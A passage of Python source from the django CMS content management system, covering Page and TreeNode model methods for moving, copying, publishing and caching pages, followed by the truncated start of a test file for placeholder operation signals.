"""
Encapsulates logic for determining if this page is eligible to be set
as `is_home`. This is a public method so that it can be accessed in the
admin for determining whether to enable the "Set as home" menu item.
:return: Boolean
"""
assert self.publisher_is_draft
# Only root nodes are eligible for homepage
return not self.is_home and bool(self.node.is_root())
def get_absolute_url(self, language=None, fallback=True):
if not language:
language = get_current_language()
with force_language(language):
if self.is_home:
return reverse('pages-root')
path = self.get_path(language, fallback) or self.get_slug(language, fallback)
return reverse('pages-details-by-slug', kwargs={"slug": path})
def get_public_url(self, language=None, fallback=True):
"""
Returns the URL of the published version of the current page.
Returns empty string if the page is not published.
"""
try:
return self.get_public_object().get_absolute_url(language, fallback)
except:
return ''
def get_draft_url(self, language=None, fallback=True):
"""
Returns the URL of the draft version of the current page.
Returns empty string if the draft page is not available.
"""
try:
return self.get_draft_object().get_absolute_url(language, fallback)
except:
return ''
def set_tree_node(self, site, target=None, position='first-child'):
assert self.publisher_is_draft
assert position in ('last-child', 'first-child', 'left', 'right')
new_node = TreeNode(site=site)
if target is None:
self.node = TreeNode.add_root(instance=new_node)
elif position == 'first-child' and target.is_branch:
self.node = target.get_first_child().add_sibling(pos='left', instance=new_node)
elif position in ('last-child', 'first-child'):
self.node = target.add_child(instance=new_node)
else:
self.node = target.add_sibling(pos=position, instance=new_node)
def move_page(self, target_node, position='first-child'):
"""
Called from admin interface when page is moved. Should be used on
all the places which are changing page position. Used like an interface
to django-treebeard, but after move is done page_moved signal is fired.
Note for issue #1166: url conflicts are handled by updated
check_title_slugs, overwrite_url on the moved page don't need any check
as it remains the same regardless of the page position in the tree
"""
assert self.publisher_is_draft
assert isinstance(target_node, TreeNode)
inherited_template = self.template == constants.TEMPLATE_INHERITANCE_MAGIC
if inherited_template and target_node.is_root() and position in ('left', 'right'):
# The page is being moved to a root position.
# Explicitly set the inherited template on the page
# to keep all plugins / placeholders.
self.update(refresh=False, template=self.get_template())
# Don't use a cached node. Always get a fresh one.
self._clear_node_cache()
# Runs the SQL updates on the treebeard fields
self.node.move(target_node, position)
if position in ('first-child', 'last-child'):
parent_id = target_node.pk
else:
# moving relative to sibling
# or to the root of the tree
parent_id = target_node.parent_id
# Runs the SQL updates on the parent field
self.node.update(parent_id=parent_id)
# Clear the cached node once again to trigger a db query
# on access.
self._clear_node_cache()
# Update the descendants to "PENDING"
# If the target (parent) page is not published
# and the page being moved is published.
titles = (
self
.title_set
.filter(language__in=self.get_languages())
.values_list('language', 'published')
)
parent_page = self.get_parent_page()
if parent_page:
parent_titles = (
parent_page
.title_set
.exclude(publisher_state=PUBLISHER_STATE_PENDING)
.values_list('language', 'published')
)
parent_titles_by_language = dict(parent_titles)
else:
parent_titles_by_language = {}
for language, published in titles:
parent_is_published = parent_titles_by_language.get(language)
# Update draft title path
self._update_title_path(language)
self._update_title_path_recursive(language)
if published and parent_is_published:
# this looks redundant but it's necessary
# for all the descendants of the page being
# moved to be set to the correct state.
self.publisher_public._update_title_path(language)
self.mark_as_published(language)
self.mark_descendants_as_published(language)
elif published and parent_page:
# page is published but it's parent is not
# mark the page being moved (source) as "pending"
self.mark_as_pending(language)
# mark all descendants of source as "pending"
self.mark_descendants_pending(language)
elif published:
self.publisher_public._update_title_path(language)
self.mark_as_published(language)
self.mark_descendants_as_published(language)
self.clear_cache()
return self
def _copy_titles(self, target, language, published):
"""
Copy the title matching language to a new page (which must have a pk).
:param target: The page where the new title should be stored
"""
source_title = self.title_set.get(language=language)
try:
target_title_id = (
target
.title_set
.filter(language=language)
.values_list('pk', flat=True)[0]
)
except IndexError:
target_title_id = None
source_title_id = source_title.pk
# If an old title exists, overwrite. Otherwise create new
source_title.pk = target_title_id
source_title.page = target
source_title.publisher_is_draft = target.publisher_is_draft
source_title.publisher_public_id = source_title_id
source_title.published = published
source_title._publisher_keep_state = True
if published:
source_title.publisher_state = PUBLISHER_STATE_DEFAULT
else:
source_title.publisher_state = PUBLISHER_STATE_PENDING
source_title.save()
return source_title
def _clear_placeholders(self, language):
from cms.models import CMSPlugin
from cms.signals.utils import disable_cms_plugin_signals
placeholders = list(self.get_placeholders())
placeholder_ids = (placeholder.pk for placeholder in placeholders)
with disable_cms_plugin_signals():
plugins = CMSPlugin.objects.filter(
language=language,
placeholder__in=placeholder_ids,
)
models.query.QuerySet.delete(plugins)
return placeholders
def _copy_contents(self, target, language):
"""
Copy all the plugins to a new page.
:param target: The page where the new content should be stored
"""
cleared_placeholders = target._clear_placeholders(language)
cleared_placeholders_by_slot = {pl.slot: pl for pl in cleared_placeholders}
for placeholder in self.get_placeholders():
try:
target_placeholder = cleared_placeholders_by_slot[placeholder.slot]
except KeyError:
target_placeholder = target.placeholders.create(
slot=placeholder.slot,
default_width=placeholder.default_width,
)
placeholder.copy_plugins(target_placeholder, language=language)
def _copy_attributes(self, target, clean=False):
"""
Copy all page data to the target. This excludes parent and other values
that are specific to an exact instance.
:param target: The Page to copy the attributes to
"""
if not clean:
target.publication_date = self.publication_date
target.publication_end_date = self.publication_end_date
target.reverse_id = self.reverse_id
target.changed_by = self.changed_by
target.login_required = self.login_required
target.in_navigation = self.in_navigation
target.soft_root = self.soft_root
target.limit_visibility_in_menu = self.limit_visibility_in_menu
target.navigation_extenders = self.navigation_extenders
target.application_urls = self.application_urls
target.application_namespace = self.application_namespace
target.template = self.template
target.xframe_options = self.xframe_options
target.is_page_type = self.is_page_type
def copy(self, site, parent_node=None, language=None,
translations=True, permissions=False, extensions=True):
from cms.utils.page import get_available_slug
if parent_node:
new_node = parent_node.add_child(site=site)
parent_page = parent_node.item
else:
new_node = TreeNode.add_root(site=site)
parent_page = None
new_page = copy.copy(self)
new_page._clear_internal_cache()
new_page.pk = None
new_page.node = new_node
new_page.publisher_public_id = None
new_page.is_home = False
new_page.reverse_id = None
new_page.publication_date = None
new_page.publication_end_date = None
new_page.languages = ''
new_page.save()
# Have the node remember its page.
# This is done to save some queries
# when the node's descendants are copied.
new_page.node.__dict__['item'] = new_page
if language and translations:
translations = self.title_set.filter(language=language)
elif translations:
translations = self.title_set.all()
else:
translations = self.title_set.none()
# copy titles of this page
for title in translations:
title = copy.copy(title)
title.pk = None
title.page = new_page
title.published = False
title.publisher_public = None
if parent_page:
base = parent_page.get_path(title.language)
path = '%s/%s' % (base, title.slug)
else:
base = ''
path = title.slug
slug = get_available_slug(site, path, title.language)
title.slug = slug
title.path = '%s/%s' % (base, slug) if base else slug
title.save()
new_page.title_cache[title.language] = title
# copy the placeholders (and plugins on those placeholders!)
for placeholder in self.placeholders.iterator():
new_placeholder = copy.copy(placeholder)
new_placeholder.pk = None
new_placeholder.save()
new_page.placeholders.add(new_placeholder)
placeholder.copy_plugins(new_placeholder, language=language)
if extensions:
from cms.extensions import extension_pool
extension_pool.copy_extensions(self, new_page)
# copy permissions if requested
if permissions and get_cms_setting('PERMISSION'):
permissions = self.pagepermission_set.iterator()
permissions_new = []
for permission in permissions:
permission.pk = None
permission.page = new_page
permissions_new.append(permission)
if permissions_new:
new_page.pagepermission_set.bulk_create(permissions_new)
return new_page
def copy_with_descendants(self, target_node=None, position=None,
copy_permissions=True, target_site=None):
"""
Copy a page [ and all its descendants to a new location ]
"""
if not self.publisher_is_draft:
raise PublicIsUnmodifiable("copy page is not allowed for public pages")
if position in ('first-child', 'last-child'):
parent_node = target_node
elif target_node:
parent_node = target_node.parent
else:
parent_node = None
if target_site is None:
target_site = parent_node.site if parent_node else self.node.site
# Evaluate the descendants queryset BEFORE copying the page.
# Otherwise, if the page is copied and pasted on itself, it will duplicate.
descendants = list(
self.get_descendant_pages()
.select_related('node')
.prefetch_related('title_set')
)
new_root_page = self.copy(target_site, parent_node=parent_node)
new_root_node = new_root_page.node
if target_node and position in ('first-child'):
# target node is a parent and user has requested to
# insert the new page as its first child
new_root_node.move(target_node, position)
new_root_node.refresh_from_db(fields=('path', 'depth'))
if target_node and position in ('left', 'last-child'):
# target node is a sibling
new_root_node.move(target_node, position)
new_root_node.refresh_from_db(fields=('path', 'depth'))
nodes_by_id = {self.node.pk: new_root_node}
for page in descendants:
parent = nodes_by_id[page.node.parent_id]
new_page = page.copy(
target_site,
parent_node=parent,
translations=True,
permissions=copy_permissions,
)
nodes_by_id[page.node_id] = new_page.node
return new_root_page
def delete(self, *args, **kwargs):
TreeNode.get_tree(self.node).delete_fast()
if self.node.parent_id:
(TreeNode
.objects
.filter(pk=self.node.parent_id)
.update(numchild=models.F('numchild') - 1))
self.clear_cache(menu=True)
def delete_translations(self, language=None):
if language is None:
languages = self.get_languages()
else:
languages = [language]
self.title_set.filter(language__in=languages).delete()
for language in languages:
self.mark_descendants_pending(language)
def save(self, **kwargs):
# delete template cache
if hasattr(self, '_template_cache'):
delattr(self, '_template_cache')
created = not bool(self.pk)
if self.reverse_id == "":
self.reverse_id = None
if self.application_namespace == "":
self.application_namespace = None
from cms.utils.permissions import get_current_user_name
self.changed_by = get_current_user_name()
if created:
self.created_by = self.changed_by
super(Page, self).save(**kwargs)
def save_base(self, *args, **kwargs):
"""Overridden save_base. If an instance is draft, and was changed, mark
it as dirty.
Dirty flag is used for changed nodes identification when publish method
takes place. After current changes are published, state is set back to
PUBLISHER_STATE_DEFAULT (in publish method).
"""
keep_state = getattr(self, '_publisher_keep_state', None)
if self.publisher_is_draft and not keep_state and self.is_new_dirty():
self.title_set.all().update(publisher_state=PUBLISHER_STATE_DIRTY)
if keep_state:
delattr(self, '_publisher_keep_state')
return super(Page, self).save_base(*args, **kwargs)
def update(self, refresh=False, draft_only=True, **data):
assert self.publisher_is_draft
cls = self.__class__
if not draft_only and self.publisher_public_id:
ids = [self.pk, self.publisher_public_id]
cls.objects.filter(pk__in=ids).update(**data)
else:
cls.objects.filter(pk=self.pk).update(**data)
if refresh:
return self.reload()
else:
for field, value in data.items():
setattr(self, field, value)
return
def update_translations(self, language=None, **data):
if language:
translations = self.title_set.filter(language=language)
else:
translations = self.title_set.all()
return translations.update(**data)
def has_translation(self, language):
return self.title_set.filter(language=language).exists()
def is_new_dirty(self):
if self.pk:
fields = [
'publication_date', 'publication_end_date', 'in_navigation', 'soft_root', 'reverse_id',
'navigation_extenders', 'template', 'login_required', 'limit_visibility_in_menu'
]
try:
old_page = Page.objects.get(pk=self.pk)
except Page.DoesNotExist:
return True
for field in fields:
old_val = getattr(old_page, field)
new_val = getattr(self, field)
if not old_val == new_val:
return True
return False
return True
def is_published(self, language, force_reload=False):
title_obj = self.get_title_obj(language, fallback=False, force_reload=force_reload)
return title_obj.published and title_obj.publisher_state != PUBLISHER_STATE_PENDING
def toggle_in_navigation(self, set_to=None):
'''
Toggles (or sets) in_navigation and invalidates the cms page cache
'''
old = self.in_navigation
if set_to in [True, False]:
self.in_navigation = set_to
else:
self.in_navigation = not self.in_navigation
self.save()
# If there was a change, invalidate the cms page cache
if self.in_navigation != old:
self.clear_cache()
return self.in_navigation
def get_publisher_state(self, language, force_reload=False):
try:
return self.get_title_obj(language, False, force_reload=force_reload).publisher_state
except AttributeError:
return None
def set_publisher_state(self, language, state, published=None):
title = self.title_set.get(language=language)
title.publisher_state = state
if published is not None:
title.published = published
title._publisher_keep_state = True
title.save()
if language in self.title_cache:
self.title_cache[language].publisher_state = state
return title
def publish(self, language):
"""
:returns: True if page was successfully published.
"""
from cms.utils.permissions import get_current_user_name
# Publish can only be called on draft pages
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be published. Use draft.')
if not self._publisher_can_publish(language):
return False
if self.publisher_public_id:
public_page = Page.objects.get(pk=self.publisher_public_id)
public_languages = public_page.get_languages()
else:
public_page = Page(created_by=self.created_by)
public_languages = [language]
self._copy_attributes(public_page, clean=False)
if language not in public_languages:
public_languages.append(language)
# TODO: Get rid of the current user thread hack
public_page.changed_by = get_current_user_name()
public_page.is_home = self.is_home
public_page.publication_date = self.publication_date or now()
public_page.publisher_public = self
public_page.publisher_is_draft = False
public_page.languages = ','.join(public_languages)
public_page.node = self.node
public_page.save()
# Copy the page translation (title) matching language
# into a "public" version.
public_title = self._copy_titles(public_page, language, published=True)
# Ensure this draft page points to its public version
self.update(
draft_only=True,
changed_by=public_page.changed_by,
publisher_public=public_page,
publication_date=public_page.publication_date,
)
# Set the draft page translation matching language
# to point to its public version.
# Its important for draft to be published even if its state
# is pending.
self.update_translations(
language,
published=True,
publisher_public=public_title,
publisher_state=PUBLISHER_STATE_DEFAULT,
)
self._copy_contents(public_page, language)
if self.node.is_branch:
self.mark_descendants_as_published(language)
if language in self.title_cache:
del self.title_cache[language]
# fire signal after publishing is done
import cms.signals as cms_signals
cms_signals.post_publish.send(sender=Page, instance=self, language=language)
public_page.clear_cache(
language,
menu=True,
placeholder=True,
)
return True
def clear_cache(self, language=None, menu=False, placeholder=False):
from cms.cache import invalidate_cms_page_cache
if get_cms_setting('PAGE_CACHE'):
# Clears all the page caches
invalidate_cms_page_cache()
if placeholder and get_cms_setting('PLACEHOLDER_CACHE'):
assert language, 'language is required when clearing placeholder cache'
placeholders = self.get_placeholders()
for placeholder in placeholders:
placeholder.clear_cache(language, site_id=self.node.site_id)
if menu:
# Clears all menu caches for this page's site
menu_pool.clear(site_id=self.node.site_id)
def unpublish(self, language, site=None):
"""
Removes this page from the public site
:returns: True if this page was successfully unpublished
"""
# Publish can only be called on draft pages
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be unpublished. Use draft.')
self.update_translations(
language,
published=False,
publisher_state=PUBLISHER_STATE_DIRTY,
)
public_page = self.get_public_object()
public_page.update_translations(language, published=False)
public_page._clear_placeholders(language)
public_page.clear_cache(language)
self.mark_descendants_pending(language)
from cms.signals import post_unpublish
post_unpublish.send(sender=Page, instance=self, language=language)
return True
def get_child_pages(self):
nodes = self.node.get_children()
pages = (
self
.__class__
.objects
.filter(
node__in=nodes,
publisher_is_draft=self.publisher_is_draft,
)
.order_by('node__path')
)
return pages
def get_ancestor_pages(self):
nodes = self.node.get_ancestors()
pages = (
self
.__class__
.objects
.filter(
node__in=nodes,
publisher_is_draft=self.publisher_is_draft,
)
.order_by('node__path')
)
return pages
def get_descendant_pages(self):
nodes = self.node.get_descendants()
pages = (
self
.__class__
.objects
.filter(
node__in=nodes,
publisher_is_draft=self.publisher_is_draft,
)
.order_by('node__path')
)
return pages
def get_root(self):
node = self.node
return self.__class__.objects.get(
node__path=node.path[0:node.steplen],
publisher_is_draft=self.publisher_is_draft,
)
def get_parent_page(self):
if not self.node.parent_id:
return None
pages = Page.objects.filter(
node=self.node.parent_id,
publisher_is_draft=self.publisher_is_draft,
)
return pages.select_related('node').first()
def mark_as_pending(self, language):
assert self.publisher_is_draft
assert self.publisher_public_id
self.get_public_object().title_set.filter(language=language).update(published=False)
if self.get_publisher_state(language) == PUBLISHER_STATE_DEFAULT:
# Only change the state if the draft page is published
# and it's state is the default (0), to avoid overriding a dirty state.
self.set_publisher_state(language, state=PUBLISHER_STATE_PENDING)
def mark_descendants_pending(self, language):
from cms.models import Title
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be altered. Use draft.')
node_descendants = self.node.get_descendants()
page_descendants = self.__class__.objects.filter(node__in=node_descendants)
if page_descendants.filter(publisher_is_draft=True).exists():
# Only change the state if the draft page is not dirty
# to avoid overriding a dirty state.
Title.objects.filter(
published=True,
language=language,
page__in=page_descendants.filter(publisher_is_draft=True),
publisher_state=PUBLISHER_STATE_DEFAULT,
).update(publisher_state=PUBLISHER_STATE_PENDING)
if page_descendants.filter(publisher_is_draft=False).exists():
Title.objects.filter(
published=True,
language=language,
page__in=page_descendants.filter(publisher_is_draft=False),
).update(published=False)
def mark_as_published(self, language):
from cms.models import Title
(Title
.objects
.filter(page=self.publisher_public_id, language=language)
.update(publisher_state=PUBLISHER_STATE_DEFAULT, published=True))
draft = self.get_draft_object()
if draft.get_publisher_state(language) == PUBLISHER_STATE_PENDING:
# A check for pending is necessary because the page might have
# been modified after it was marked as pending.
draft.set_publisher_state(language, PUBLISHER_STATE_DEFAULT)
def mark_descendants_as_published(self, language):
from cms.models import Title
if not self.publisher_is_draft:
raise PublicIsUnmodifiable('The public instance cannot be published. Use draft.')
base = self.get_path(language, fallback=True)
node_children = self.node.get_children()
page_children = self.__class__.objects.filter(node__in=node_children)
page_children_draft = page_children.filter(publisher_is_draft=True)
page_children_public = page_children.filter(publisher_is_draft=False)
# Set public pending titles as published
unpublished_public = Title.objects.filter(
language=language,
page__in=page_children_public,
publisher_public__published=True,
)
# Update public title paths
unpublished_public.exclude(has_url_overwrite=True).update(
path=Concat(models.Value(base), models.Value('/'), models.F('slug'))
)
# Set unpublished pending titles to published
unpublished_public.filter(published=False).update(published=True)
# Update drafts
Title.objects.filter(
published=True,
language=language,
page__in=page_children_draft,
publisher_state=PUBLISHER_STATE_PENDING
).update(publisher_state=PUBLISHER_STATE_DEFAULT)
# Continue publishing descendants, one branch at a time.
published_children = page_children_draft.filter(
title_set__published=True,
title_set__language=language,
)
for child in published_children.iterator():
child.mark_descendants_as_published(language)
def revert_to_live(self, language):
"""Revert the draft version to the same state as the public version
"""
if not self.publisher_is_draft:
# Revert can only be called on draft pages
raise PublicIsUnmodifiable('The public instance cannot be reverted. Use draft.')
public = self.get_public_object()
if not public:
raise PublicVersionNeeded('A public version of this page is needed')
public._copy_attributes(self)
public._copy_contents(self, language)
public._copy_titles(self, language, public.is_published(language))
self.update_translations(
language,
published=True,
publisher_state=PUBLISHER_STATE_DEFAULT,
)
self._publisher_keep_state = True
self.save()
def get_draft_object(self):
if not self.publisher_is_draft:
return self.publisher_draft
return self
def get_public_object(self):
if not self.publisher_is_draft:
return self
return self.publisher_public
def get_languages(self):
if self.languages:
return sorted(self.languages.split(','))
else:
return []
def remove_language(self, language):
page_languages = self.get_languages()
if language in page_languages:
page_languages.remove(language)
self.update_languages(page_languages)
def update_languages(self, languages):
languages = ",".join(languages)
# Update current instance
self.languages = languages
# Commit. It's important to not call save()
# we'd like to commit only the languages field and without
# any kind of signals.
self.update(draft_only=False, languages=languages)
def get_published_languages(self):
if self.publisher_is_draft:
return self.get_languages()
return sorted([language for language in self.get_languages() if self.is_published(language)])
def set_translations_cache(self):
for translation in self.title_set.all():
self.title_cache.setdefault(translation.language, translation)
def get_path_for_slug(self, slug, language):
if self.is_home:
return ''
if self.parent_page:
base = self.parent_page.get_path(language, fallback=True)
# base can be empty when the parent is a home-page
path = u'%s/%s' % (base, slug) if base else slug
else:
path = slug
return path
# ## Title object access
def get_title_obj(self, language=None, fallback=True, force_reload=False):
"""Helper function for accessing wanted / current title.
If wanted title doesn't exists, EmptyTitle instance will be returned.
"""
language = self._get_title_cache(language, fallback, force_reload)
if language in self.title_cache:
return self.title_cache[language]
from cms.models.titlemodels import EmptyTitle
return EmptyTitle(language)
def get_title_obj_attribute(self, attrname, language=None, fallback=True, force_reload=False):
"""Helper function for getting attribute or None from wanted/current title.
"""
try:
attribute = getattr(self.get_title_obj(language, fallback, force_reload), attrname)
return attribute
except AttributeError:
return None
def get_path(self, language=None, fallback=True, force_reload=False):
"""
get the path of the page depending on the given language
"""
return self.get_title_obj_attribute("path", language, fallback, force_reload)
def get_slug(self, language=None, fallback=True, force_reload=False):
"""
get the slug of the page depending on the given language
"""
return self.get_title_obj_attribute("slug", language, fallback, force_reload)
def get_title(self, language=None, fallback=True, force_reload=False):
"""
get the title of the page depending on the given language
"""
return self.get_title_obj_attribute("title", language, fallback, force_reload)
def get_menu_title(self, language=None, fallback=True, force_reload=False):
"""
get the menu title of the page depending on the given language
"""
menu_title = self.get_title_obj_attribute("menu_title", language, fallback, force_reload)
if not menu_title:
return self.get_title(language, True, force_reload)
return menu_title
def get_placeholders(self):
if not hasattr(self, '_placeholder_cache'):
self._placeholder_cache = self.placeholders.all()
return self._placeholder_cache
def _validate_title(self, title):
from cms.models.titlemodels import EmptyTitle
if isinstance(title, EmptyTitle):
return False
if not title.title or not title.slug:
return False
return True
def get_admin_tree_title(self):
from cms.models.titlemodels import EmptyTitle
language = get_language()
if not self.title_cache:
self.set_translations_cache()
if language not in self.title_cache or not self._validate_title(self.title_cache.get(language, EmptyTitle(language))):
fallback_langs = i18n.get_fallback_languages(language)
found = False
for lang in fallback_langs:
if lang in self.title_cache and self._validate_title(self.title_cache.get(lang, EmptyTitle(lang))):
found = True
language = lang
if not found:
language = None
for lang, item in self.title_cache.items():
if not isinstance(item, EmptyTitle):
language = lang
if not language:
return _("Empty")
title = self.title_cache[language]
if title.title:
return title.title
if title.page_title:
return title.page_title
if title.menu_title:
return title.menu_title
return title.slug
def get_changed_date(self, language=None, fallback=True, force_reload=False):
"""
get when this page was last updated
"""
return self.changed_date
def get_changed_by(self, language=None, fallback=True, force_reload=False):
"""
get user who last changed this page
"""
return self.changed_by
def get_page_title(self, language=None, fallback=True, force_reload=False):
"""
get the page title of the page depending on the given language
"""
page_title = self.get_title_obj_attribute("page_title", language, fallback, force_reload)
if not page_title:
return self.get_title(language, True, force_reload)
return page_title
def get_meta_description(self, language=None, fallback=True, force_reload=False):
"""
get content for the description meta tag for the page depending on the given language
"""
return self.get_title_obj_attribute("meta_description", language, fallback, force_reload)
def get_application_urls(self, language=None, fallback=True, force_reload=False):
"""
get application urls conf for application hook
"""
return self.application_urls
def get_redirect(self, language=None, fallback=True, force_reload=False):
"""
get redirect
"""
return self.get_title_obj_attribute("redirect", language, fallback, force_reload)
def _get_title_cache(self, language, fallback, force_reload):
if not language:
language = get_language()
force_reload = (force_reload or language not in self.title_cache)
if fallback and not self.title_cache.get(language):
# language can be in the cache but might be an EmptyTitle instance
fallback_langs = i18n.get_fallback_languages(language)
for lang in fallback_langs:
if self.title_cache.get(lang):
return lang
if force_reload:
from cms.models.titlemodels import Title
titles = Title.objects.filter(page=self)
for title in titles:
self.title_cache[title.language] = title
if self.title_cache.get(language):
return language
else:
if fallback:
fallback_langs = i18n.get_fallback_languages(language)
for lang in fallback_langs:
if self.title_cache.get(lang):
return lang
return language
def get_template(self):
"""
get the template of this page if defined or if closer parent if
defined or DEFAULT_PAGE_TEMPLATE otherwise
"""
if hasattr(self, '_template_cache'):
return self._template_cache
if self.template != constants.TEMPLATE_INHERITANCE_MAGIC:
self._template_cache = self.template or get_cms_setting('TEMPLATES')[0][0]
return self._template_cache
templates = (
self
.get_ancestor_pages()
.exclude(template=constants.TEMPLATE_INHERITANCE_MAGIC)
.order_by('-node__path')
.values_list('template', flat=True)
)
try:
self._template_cache = templates[0]
except IndexError:
self._template_cache = get_cms_setting('TEMPLATES')[0][0]
return self._template_cache
def get_template_name(self):
"""
get the textual name (2nd parameter in get_cms_setting('TEMPLATES'))
of the template of this page or of the nearest
ancestor. failing to find that, return the name of the default template.
"""
template = self.get_template()
for t in get_cms_setting('TEMPLATES'):
if t[0] == template:
return t[1]
return _("default")
def has_view_permission(self, user):
from cms.utils.page_permissions import user_can_view_page
return user_can_view_page(user, page=self)
def has_view_restrictions(self, site):
from cms.models import PagePermission
if get_cms_setting('PERMISSION'):
page = self.get_draft_object()
restrictions = (
PagePermission
.objects
.for_page(page)
.filter(can_view=True)
)
return restrictions.exists()
return False
def has_add_permission(self, user):
"""
Has user ability to add page under current page?
"""
from cms.utils.page_permissions import user_can_add_subpage
return user_can_add_subpage(user, self)
def has_change_permission(self, user):
from cms.utils.page_permissions import user_can_change_page
return user_can_change_page(user, page=self)
def has_delete_permission(self, user):
from cms.utils.page_permissions import user_can_delete_page
return user_can_delete_page(user, page=self)
def has_delete_translation_permission(self, user, language):
from cms.utils.page_permissions import user_can_delete_page_translation
return user_can_delete_page_translation(user, page=self, language=language)
def has_publish_permission(self, user):
from cms.utils.page_permissions import user_can_publish_page
return user_can_publish_page(user, page=self)
def has_advanced_settings_permission(self, user):
from cms.utils.page_permissions import user_can_change_page_advanced_settings
return user_can_change_page_advanced_settings(user, page=self)
def has_change_permissions_permission(self, user):
"""
Has user ability to change permissions for current page?
"""
from cms.utils.page_permissions import user_can_change_page_permissions
return user_can_change_page_permissions(user, page=self)
def has_move_page_permission(self, user):
"""Has user ability to move current page?
"""
from cms.utils.page_permissions import user_can_move_page
return user_can_move_page(user, page=self)
def has_placeholder_change_permission(self, user):
if not self.publisher_is_draft:
return False
return self.has_change_permission(user)
def get_media_path(self, filename):
"""
Returns path (relative to MEDIA_ROOT/MEDIA_URL) to directory for storing
page-scope files. This allows multiple pages to contain files with
identical names without namespace issues. Plugins such as Picture can
use this method to initialise the 'upload_to' parameter for File-based
fields. For example:
image = models.ImageField(
_("image"), upload_to=CMSPlugin.get_media_path)
where CMSPlugin.get_media_path calls self.page.get_media_path
This location can be customised using the CMS_PAGE_MEDIA_PATH setting
"""
return join(get_cms_setting('PAGE_MEDIA_PATH'), "%d" % self.pk, filename)
def reload(self):
"""
Reload a page from the database
"""
return self.__class__.objects.get(pk=self.pk)
def _publisher_can_publish(self, language):
"""Is parent of this object already published?
"""
if self.is_page_type:
return False
if not self.parent_page:
return True
if self.parent_page.publisher_public_id:
return self.parent_page.get_public_object().is_published(language)
return False
def rescan_placeholders(self):
"""
Rescan and if necessary create placeholders in the current template.
"""
existing = OrderedDict()
placeholders = [pl.slot for pl in self.get_declared_placeholders()]
for placeholder in self.placeholders.all():
if placeholder.slot in placeholders:
existing[placeholder.slot] = placeholder
for placeholder in placeholders:
if placeholder not in existing:
existing[placeholder] = self.placeholders.create(slot=placeholder)
return existing
def get_declared_placeholders(self):
# inline import to prevent circular imports
from cms.utils.placeholder import get_placeholders
return get_placeholders(self.get_template())
def get_declared_static_placeholders(self, context):
# inline import to prevent circular imports
from cms.utils.placeholder import get_static_placeholders
return get_static_placeholders(self.get_template(), context)
def get_xframe_options(self):
""" Finds X_FRAME_OPTION from tree if inherited """
xframe_options = self.xframe_options or self.X_FRAME_OPTIONS_INHERIT
if xframe_options != self.X_FRAME_OPTIONS_INHERIT:
return xframe_options
# Ignore those pages which just inherit their value
ancestors = self.get_ancestor_pages().order_by('-node__path')
ancestors = ancestors.exclude(xframe_options=self.X_FRAME_OPTIONS_INHERIT)
# Now just give me the clickjacking setting (not anything else)
xframe_options = ancestors.values_list('xframe_options', flat=True)
try:
return xframe_options[0]
except IndexError:
return None
class PageType(Page):
class Meta:
proxy = True
default_permissions = []
@classmethod
def get_root_page(cls, site):
pages = Page.objects.on_site(site).filter(
node__depth=1,
is_page_type=True,
)
return pages.first()
def is_potential_home(self):
return False
@python_2_unicode_compatible
class TreeNode(MP_Node):
parent = models.ForeignKey(
'self',
on_delete=models.CASCADE,
blank=True,
null=True,
related_name='children',
db_index=True,
)
site = models.ForeignKey(
Site,
on_delete=models.CASCADE,
verbose_name=_("site"),
related_name='djangocms_nodes',
db_index=True,
)
objects = PageNodeManager()
class Meta:
app_label = 'cms'
ordering = ('path',)
default_permissions = []
def __str__(self):
return self.path
@cached_property
def item(self):
return self.get_item()
def get_item(self):
# Paving the way...
return Page.objects.get(node=self, publisher_is_draft=True)
@property
def is_branch(self):
return bool(self.numchild)
def get_ancestor_paths(self):
paths = frozenset(
self.path[0:pos]
for pos in range(0, len(self.path), self.steplen)[1:]
)
return paths
def add_child(self, **kwargs):
if len(kwargs) == 1 and 'instance' in kwargs:
kwargs['instance'].parent = self
else:
kwargs['parent'] = self
return super(TreeNode, self).add_child(**kwargs)
def add_sibling(self, pos=None, *args, **kwargs):
if len(kwargs) == 1 and 'instance' in kwargs:
kwargs['instance'].parent_id = self.parent_id
else:
kwargs['parent_id'] = self.parent_id
return super(TreeNode, self).add_sibling(*args, **kwargs)
def update(self, **data):
cls = self.__class__
cls.objects.filter(pk=self.pk).update(**data)
for field, value in data.items():
setattr(self, field, value)
return
def get_cached_ancestors(self):
if self._has_cached_hierarchy():
return self._ancestors
return []
def get_cached_descendants(self):
if self._has_cached_hierarchy():
return self._descendants
return []
def _reload(self):
"""
Reload a page node from the database
"""
return self.__class__.objects.get(pk=self.pk)
def _has_cached_hierarchy(self):
return hasattr(self, '_descendants') and hasattr(self, '_ancestors')
def _set_hierarchy(self, nodes, ancestors=None):
if self.is_branch:
self._descendants = [node for node in nodes
if node.path.startswith(self.path)
and node.depth > self.depth]
else:
self._descendants = []
if self.is_root():
self._ancestors = []
else:
self._ancestors = ancestors
children = (node for node in self._descendants
if node.depth == self.depth + 1)
for child in children:
child._set_hierarchy(self._descendants, ancestors=([self] + self._ancestors))
```
#### File: cms/tests/test_placeholder_operation_signals.py
```python
from cms.api import add_plugin
from cms.models import Page, Placeholder, UserSettings
from cms.operations import (
ADD_PLUGIN,
ADD_PLUGINS_FROM_PLACEHOLDER,
CLEAR_PLACEHOLDER,
CHANGE_PLUGIN,
DELETE_PLUGIN,
CUT_PLUGIN,
MOVE_PLUGIN,
PASTE_PLUGIN,
PASTE_PLACEHOLDER,
)
from cms.signals import pre_placeholder_operation, post_placeholder_operation
from cms.test_utils.testcases import CMSTestCase
from cms.utils.compat.tests import UnittestCompatMixin
from cms.test_utils.util.context_managers import signal_tester
#TODO: DO this for app placeholders
class OperationSignalsTestCase(CMSTestCase, UnittestCompatMixin):
def _add_plugin(self, placeholder=None, plugin_type='LinkPlugin', language='en'):
placeholder = placeholder or self._cms_placeholder
plugin_data = {
'LinkPlugin': {'name': 'A Link', 'external_link': 'https://www.django-cms.org'},
'PlaceholderPlugin': {},
}
plugin = add_plugin(
placeholder,
plugin_type,
language,
**plugin_data[plugin_type]
)
return plugin
def _get_add_plugin_uri(self, language='en'):
uri = self.get_add_plugin_uri(
placeholder=self._cms_placeholder,
plugin_type='LinkPlugin',
language=language,
)
return uri
def setUp(self):
self._admin_user = self.get_superuser()
self._cms_page = self.create_homepage(
"home",
"nav_playground.html",
"en",
created_by=self._admin_user,
published=True,
)
self._cms_placeholder = self._cms_page.placeholders.get(slot='body')
def test_pre_add_plugin(self):
